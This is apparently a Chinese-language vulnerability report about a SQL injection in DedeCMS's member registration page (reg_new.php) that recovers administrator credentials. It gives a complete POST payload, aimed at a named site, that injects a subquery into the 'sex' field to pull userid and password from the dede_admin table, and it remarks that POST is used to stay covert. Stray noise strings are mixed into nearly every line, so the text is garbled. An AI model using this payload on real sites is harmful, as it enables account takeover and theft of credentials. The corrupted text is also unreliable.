漏洞类型: SQL注射漏洞# V M" l9 K0 r$ W1 y, t9 M
简要描述:
6 a$ I( ]9 w+ x" r. z2 o
- s1 }% z9 }6 k; S. T! |3 t8 `需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.2 L8 x# k# i! Y8 x H
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
- H0 I- e3 J- b* S" v详细说明:跟这个漏洞
) v" f* A" l0 u& s) _ ( N K* G N) i' i3 Q
WooYun: Dedecms SQL注射导致审核机制绕过漏洞) P% F7 b: E2 Y' l) M$ {
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.3 W r2 R2 N+ P% R) r2 s
POST提交以下数据,其实不用POST提交的,这样隐蔽点., J* I( i2 W3 h3 C
. B6 {. ^; U, P. w; C( c% C, b4 O
www.political-security.com/member/reg_new.php- f) B; ~/ o+ j& @ _7 w: @1 F
$ f7 J0 D/ M! D" ]4 ^8 NPOST
! u' O+ _4 i. L" r
# `/ {% s, E* s. P6 f6 W8 w. Xdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
0 n7 r4 }8 o5 f2 T% n1 ^userid=c4rp3nt3r&uname=c4rp3nt3r
. D. |- V; |) p&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
4 h4 x3 `$ L0 h' s- g/ e2 @1 B&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,/ N, R0 @4 T! T. L
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
5 b1 e# x: Z5 z( x6 i6 X$ n H6 D# c, Z: Z%00&vdcode=glos&agree= |